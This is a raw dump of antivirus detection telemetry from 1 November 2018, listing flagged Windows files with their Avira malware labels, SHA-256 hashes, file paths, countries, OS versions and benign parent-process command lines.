  Row(detection=Row(filename='avscan-20181101-210036-1807c22f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b4863973\\AVSCAN-20181101-195810-E274B34F\\AVSCAN-20181101-210036-1807C22F', filesize=1536000, name='TR/CoinMiner.FS.#M1.#R1'), hash='ceb88ee9dae99f8cbaf2fb4eb6956a2783af3ee8e8bd19e3f74cfa7cf1891546', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:00:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092014-b8361a0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_235acee9\\AVSCAN-20181101-091706-95192ACD\\AVSCAN-20181101-092014-B8361A0D', filesize=1536000, name='TR/CoinMiner.FS.#M1.#R1'), hash='ceb88ee9dae99f8cbaf2fb4eb6956a2783af3ee8e8bd19e3f74cfa7cf1891546', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:20:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-193824-1d5a7c28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_567802d4\\AVSCAN-20181101-193655-182C8F4A\\AVSCAN-20181101-193824-1D5A7C28', filesize=1536000, name='TR/CoinMiner.FS.#M1.#R1'), hash='ceb88ee9dae99f8cbaf2fb4eb6956a2783af3ee8e8bd19e3f74cfa7cf1891546', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:38:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091838-a65a6cbb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_235acee9\\AVSCAN-20181101-091706-95192ACD\\AVSCAN-20181101-091838-A65A6CBB', filesize=1536000, name='TR/CoinMiner.FS.#M1.#R1'), hash='ceb88ee9dae99f8cbaf2fb4eb6956a2783af3ee8e8bd19e3f74cfa7cf1891546', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:18:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091803-9fd20220', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_235acee9\\AVSCAN-20181101-091706-95192ACD\\AVSCAN-20181101-091803-9FD20220', filesize=1536000, name='TR/CoinMiner.FS.#M1.#R1'), hash='ceb88ee9dae99f8cbaf2fb4eb6956a2783af3ee8e8bd19e3f74cfa7cf1891546', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:18:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='C:\\Users\\X\\Desktop\\yedek\\hob\\YedeK\\huseyin\\AppData\\Local\\LPT\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='cf1c0582fc6f2439107bc2a9b19e001f7ad5b8733a99e3c247aff85107152e3d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe7_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:36:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='panorama.dll', filepath='C:\\Program Files (x86)\\Steam\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='SV', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:18:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:55:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='panorama.dll', filepath='C:\\Program Files (x86)\\Steam\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:34:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='panorama.dll', filepath='D:\\Steam\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:25:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='panorama.dll', filepath='C:\\Program Files (x86)\\Steam\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:46:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:06:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:40:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110206-0d479e68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_118ac77b\\AVSCAN-20181101-094023-456A0C31\\AVSCAN-20181101-110206-0D479E68', filesize=2112000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='cf832cc7ae0c84a63de59273102cb35b9b650dbf9e479010e7eab9a00507a079', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cfe744b05bdf540032ed1692c087d5f45285aa061357e440587566d8b3849c7e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\CFE744B05BDF540032ED1692C087D5F45285AA061357E440587566D8B3849C7E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='cfe744b05bdf540032ed1692c087d5f45285aa061357e440587566d8b3849c7e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:12:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d02cf1f559cfb2b7aa152bed46699c2ea76d378f03c14d04432c486e01b76c35', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D02CF1F559CFB2B7AA152BED46699C2EA76D378F03C14D04432C486E01B76C35', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d02cf1f559cfb2b7aa152bed46699c2ea76d378f03c14d04432c486e01b76c35', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:10:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxunzip.exe', filepath='C:\\PROGRAM FILES\\Autodesk\\3DS MAX 2013\\maxunzip.exe', filesize=92000, name='W32/Sality.AT.#M1.#R1'), hash='d03bc9dd261ae58634f8d3b1aaaf90177dca21160a72a4ec22b776d3809dda0d', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:12:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='initwain.exe', filepath='C:\\Program Files\\ScanSoft\\PaperPort\\initwain.exe', filesize=116000, name='W32/Infector.Gen.#M300.#R7863'), hash='d04b6016946a3a7495aad8bbba344df6f8fb5336e3f3a54f6c4ece068d6a6255', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:44:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d0ff639a2672c1107ce002612be651ed5663218bad857da6435b5b0c0e76d08e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D0FF639A2672C1107CE002612BE651ED5663218BAD857DA6435B5B0C0E76D08E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d0ff639a2672c1107ce002612be651ed5663218bad857da6435b5b0c0e76d08e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:58:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\BKP HD PROBLEMA\\Desktop\\Lixo 2\\Desktop 2015\\Programas Eli\\Driver Acer Preto\\Windows 7\\Bluetooth_Broadcom_6.3.0.7300_W7x64_A\\Bluetooth_Broadcom_6.3.0.7300_W7x64\\Win32\\Setup.exe', filesize=948000, name='W32/Neshta.A.#M1.#R1'), hash='d14e03debb9260c13a9e2f3bf97b37f4df980966303ab775b8656f8eed60acea', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:21:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194604-4589288e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194604-4589288E', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:46:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112629-002ee4bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8173745\\AVSCAN-20181101-111512-6E8DC715\\AVSCAN-20181101-112629-002EE4BC', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:26:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194530-41b2574e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194530-41B2574E', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194539-42bcfd2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194539-42BCFD2B', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194537-4277c1d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194537-4277C1D3', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194527-41761a54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194527-41761A54', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194534-4237c682', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194534-4237C682', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194503-3ec0d15d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194503-3EC0D15D', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194533-420eeeee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194533-420EEEEE', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194738-4fd804fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194738-4FD804FB', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:47:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194714-4d2c1949', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194714-4D2C1949', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:47:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194737-4fc2585f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194737-4FC2585F', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:47:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194630-485b02f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194630-485B02F8', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:46:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194624-47b1cbfa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194624-47B1CBFA', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:46:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194407-38963657', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194407-38963657', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194406-3879e9e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194406-3879E9E9', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171408-3d5a36cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_663900e3\\AVSCAN-20181101-170107-D099EE44\\AVSCAN-20181101-171408-3D5A36CB', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:15:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194401-37e6d4f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194401-37E6D4F7', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194420-3a056e5b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194420-3A056E5B', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194243-2f47eb99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194243-2F47EB99', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194240-2ef8273d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194240-2EF8273D', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194224-2d2c7fa4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194224-2D2C7FA4', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194221-2cdea660', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194221-2CDEA660', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194418-39d3f906', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194418-39D3F906', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194455-3ddae94d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194455-3DDAE94D', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d25662e3356696a3477cf60461f00ab73846d7647a70b6c093c9e85553a8d845', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\D25662E3356696A3477CF60461F00AB73846D7647A70B6C093C9E85553A8D845', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d25662e3356696a3477cf60461f00ab73846d7647a70b6c093c9e85553a8d845', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:12:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='r2speedcheckz46.exe.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Program Files (x86)\\ver1SpeedCheck\\r2SpeedCheckz46.exe.vir', filesize=512000, name='HEUR/AGEN.1015012.#M1.#R1'), hash='d278166de22e4abe16dc3191465b6729c27d64150e466b3dd531a99a23ebc945', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:24:34Z'), dt=datetime.date(2018, 11, 1)),
